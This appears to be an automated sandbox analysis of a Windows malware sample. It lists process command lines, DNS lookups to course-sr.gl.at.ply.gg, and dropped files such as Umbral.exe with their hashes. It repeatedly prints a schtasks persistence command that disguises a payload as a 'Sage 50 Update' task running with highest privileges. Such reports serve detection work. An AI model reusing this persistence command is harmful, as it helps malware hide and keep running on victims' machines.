C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1568 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:1
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1904,i,3202879844152574440,13800444895104505254,131072 /prefetch:2
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.0.1828979728\1919367302" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1748 -prefsLen 22244 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b1b1123-1eae-4fdd-928b-2b99816aa05a} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 1836 2b9a9c0d358 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.1.1315284023\1780381257" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2364 -prefsLen 22280 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {172ebe2d-3800-4d47-94df-5ec78e589285} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 2400 2b995989058 socket
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.2.1887130961\1157736587" -childID 1 -isForBrowser -prefsHandle 3180 -prefMapHandle 3176 -prefsLen 22318 -prefMapSize 235121 -jsInitHandle 1280 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {202c697e-5b3c-4a09-bf9b-aaae88af5797} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 3192 2b9aca04458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.3.896427616\1818787698" -childID 2 -isForBrowser -prefsHandle 4052 -prefMapHandle 4048 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1280 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2caaec5d-5483-4641-8045-f9af44108d80} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 4064 2b995940f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.4.1425474836\635350413" -childID 3 -isForBrowser -prefsHandle 4888 -prefMapHandle 4884 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1280 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcc9c706-14e3-4dc2-a0ab-03730bbde95b} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 4896 2b9b0273458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.5.226799178\1314096882" -childID 4 -isForBrowser -prefsHandle 4996 -prefMapHandle 5000 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1280 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0d372bc-ba99-4128-a937-7a762ec37de6} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 4960 2b9b0273d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1584.6.1110262859\224323783" -childID 5 -isForBrowser -prefsHandle 5276 -prefMapHandle 5272 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1280 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d576924f-d924-4c5b-96d4-500bc613b9f5} 1584 "\\.\pipe\gecko-crash-server-pipe.1584" 5176 2b9b0275858 tab
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.4.4:53 | google.com | udp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | course-sr.gl.at.ply.gg | udp |
| N/A | 127.0.0.1:54360 | tcp | |
| N/A | 127.0.0.1:54380 | tcp |
Files
memory/884-1-0x00007FFECB833000-0x00007FFECB835000-memory.dmp
memory/884-0-0x00000000000A0000-0x00000000000F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
| MD5 | 6787e0a40d568fa795d5f161b6643319 |
| SHA1 | f2a25997405ae299f1f0b79a14b428576c2222cb |
| SHA256 | c48fdb6d13f7a2a778a646aaaf2cba2ddf9f2cf523ff1f700185213057116ee6 |
| SHA512 | 66eaa3d8b524e3cb9d3f3d40034f8321f24c1b5ed77e8039f5682116776edfd59519f2aefa7cb8b35e5939dfaf744197abf0c0a85067ac98ff6cb4d289e38a91 |
memory/884-10-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
| MD5 | dc8cfe903cd39191e93c5003568f75e9 |
| SHA1 | 8406d466aba0fa4dcd59ae3059d8dc393e77e25d |
| SHA256 | 4068e0955554c872492cb955ae63e983a57db97c43966af5e73feb5618c44486 |
| SHA512 | a55117aa65c1bb4a5230da4aa4661e99a1c80163938230d752c3442173c90f6e5f2abd630fc8b09b9f14eb75da9f355c19f3bd37845fa8efc0f625b2b1506407 |
memory/3936-17-0x0000000000040000-0x00000000000B2000-memory.dmp
memory/3936-23-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/2280-28-0x0000020BA7FF0000-0x0000020BA8030000-memory.dmp
memory/884-29-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/2280-30-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
C:\Windows\xdwd.dll
| MD5 | 16e5a492c9c6ae34c59683be9c51fa31 |
| SHA1 | 97031b41f5c56f371c28ae0d62a2df7d585adaba |
| SHA256 | 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66 |
| SHA512 | 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 0de9b7fa53b9f453b2a805347b45c92a |
| SHA1 | 8ae14efcbed9672ffd5a76b5a2216dfd939976ca |
| SHA256 | 68755966296fd110ecf4e2083a1eb9d20d81b929743cfb9f58f9932697c2e824 |
| SHA512 | 1f7da0cb0901e49c65631d32cdc34ee198a3d522d50fbe6b93455573f98e138ae7ebd13773018a6344f6aca8a828ce100f71a0abc9cf13238556b12b76c4a4f8 |
\??\pipe\crashpad_3532_BFGSKFDZJKHMLWXI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/3936-131-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/2280-148-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2f7d396a088a48083476a555e3591988 |
| SHA1 | a8f6118a47791a71ba16ccb8eb53b5403808ed25 |
| SHA256 | dfc73a14e525d0d05b712b9de71dc93e7ec1ee83d732deb24134688a0ad411c0 |
| SHA512 | 4f640d7069359fe06f24b509f16592728492cb6204f2988b829ca77fe5f58053e174e4ce2ab322ebf8e1a4825d73e27fbb39b84cffd16bf027829a73c497ef18 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5f92437cca0579e419089906ae3bab3e |
| SHA1 | 6bfbd7ee8da978d09bfcd523a5afe3190bb9f187 |
| SHA256 | b7271576d59102114f10061fb2018703f011786afbafdd53f301ca06809cea20 |
| SHA512 | 86b01894be05dbcfdee39acff12cdc24a66427b48704a698124e22a4430f8290f30c788da1facdb6340c5cef2bd5550833f00fe5cbcd029fe909cdbe90a311c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\e5819319-4617-4cb5-84bd-fde5d049f8d4.tmp
| MD5 | 9eda37b10ea7ceb8fe14a4a8a3637a7e |
| SHA1 | 10015e6c8657c5b0f8f9fd1a44d8533102f3776e |
| SHA256 | 03814a6dd37d01faf1f75b0787d540f4ec16008d0425c1eb227e82ccb10746e5 |
| SHA512 | 71299c2fa0b0251aca7d7625701f2cf48d15dfd31d58e7bb8434ab23f414ec2c1e0032861002067e1886056fa886e3ef28deeb2a791fbc3334815dfc1e354193 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 10325457e3594a1b21b52bcc72d16638 |
| SHA1 | 3224ed6648a484d9cab78d51b3a4d153c4306058 |
| SHA256 | 90e480b23a4d3ac1f00d5aa85f6b20b0c8802cab255d376e0f20b9ef87882c25 |
| SHA512 | 6ef9dfef07ee211acaa10629cb627e6add96ff79d09fba264e903c3d1474371cd7bc87beb638740f34ee9eb4360f3d13fe576fa25c7a62f2a8c86b01d57eb1e6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5837b5.TMP
| MD5 | 0aa1923441762fff58d4a063f3f46e11 |
| SHA1 | 6195223db8268e72aafcc330465e3eb52561f7f7 |
| SHA256 | a91269333c20ef2b2616f562579285687b713e7e7d0f6265b6536616e3075b23 |
| SHA512 | 382d1989e70bda67cd5bd911660c28c91fe985a7a832cfa15707c0d559a722066f3be8b95f701fa997cac205bdc4a1095d67bacbc441151a1ff8fa00d15960e4 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ue3bcu6m.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 0cffff6e312deaa9d3794f6eb1576bcc |
| SHA1 | df81d8e28278e02a4906abe22165f15ff92aa2b1 |
| SHA256 | baa330739342960ad4f04c486985b4356c5c23c781e01e6eea99fcc380e73acc |
| SHA512 | e137b475ad3c59a0ecf94a034a8cfcfd7f6e083627399354ad06e8969f899457b90d888f1dc50a4d1b8e3f74bfc243ed49f0f8bfc0a8ddf977767051b5df27c8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2009d77647c384bfc7207f498a273da7 |
| SHA1 | 55319048e979cd44a6667418fae096ec0afec0fc |
| SHA256 | 505cd558aed0d2d01c04dabafa59f8263bf202bde884a0a8d2b52754a024b413 |
| SHA512 | a5c5cb44acc5c1b1665c1e89d01d6898c9f24493acb6fba641b25d975332112538bc1ea9a954d2e76176d26f6eaad9e69c49e2a8aecd571aea324813c61a3a1d |